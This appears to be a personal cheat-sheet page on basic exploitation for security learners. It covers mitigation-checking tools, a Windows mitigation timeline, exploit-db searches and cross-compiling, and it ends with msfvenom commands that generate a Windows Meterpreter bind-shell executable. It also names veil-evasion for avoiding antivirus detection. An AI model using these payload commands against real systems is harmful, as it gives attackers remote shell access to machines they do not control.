|\ __________                          __   __                         __
         | |   __     |          _____ __    __\__/_|  |_ __ ___   _____   ___ |  |\_____     
         | |  /  \    |         /  _  \  \  /  /  |_    _|  /   \ /  _  \ /  _ \  |/  _  \    
         | |  \  /___ |        /  /_\  \  \/  /|  | |  |\|   /\  \  / \  \  / \   |  /_\  \   
         | |__/    _ \|        |  _____||    |\|  | |  | |  |\|  |  |\|  |  |\|   |  _____|\  
         | |___/\  \\_\        \  \____/  /\  \|  | |  | |  | |  |  \_/  /  \_/   |  \___ \|  
         | |    /   \_|         \_____/__/ /\__\__| |__| |__| |__|\_____/ \____/__|\_____/\   
         | |   / / \___|         \____\__\/  \__\__\|\__\|\__\|\__\\____\/ \___\\__\\____\/   
         | |__/_/_____|     
         |/

Last changed: 20.07.2020

basic exploitation

Here I collect some notes on finding or writing simple exploits.

exploitation

The websites root-me.org and io.netgarage.org offer many different callenges for practice.

exploit mitigations

To detect optional exploit mitigation features in PE binaries. pev contains the tool pesec

pesec binary.exe

For ELF binaries you can use checksec.sh.

./checksec file=elf_binary

windows mitigation timeline

The following table shows some exploit mitigations and the Windows versions introducing it.

XP SP2 Vista Windows 7 Windows 8 Windows 10
DEP ASLR EMET GuardPages CFG
SafeSEH LFH SMEP Exploit Guard
SafeUnlink SEHOP
Canaries

You can check the Exploit Guard status in Windows 10 with powershell

Get-ProcessMitigation -System

find publicly available exploits

online exploit ressources

www.exploit-db.com/search/
google: <search_string> exploit site:securityfocus.com inurl:bid

exploit-db (offline)

searchsploit <search_string>
grep -i <search_string> /usr/share/exploitdb/files_exploits.csv

compilation

show local libc version

$(ldd $(which ls) | grep libc.so | cut -d " " -f3) | head -n1

compile for 32bit target

apt install gcc-multilib
gcc -m32 exploit.c -o exploit

compile for windows target

/home/user/.wine/drive_c/MinGW/bin/gcc.exe exploit.c -o exploit.exe

Another way to setup the cross-compile environment is to install veil-evasion.

meterpreter binary

msfvenom -l payloads
msfvenom -p windows/x64/meterpreter/bind_tcp --list-options
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=1337 -f exe -o meterpreter.exe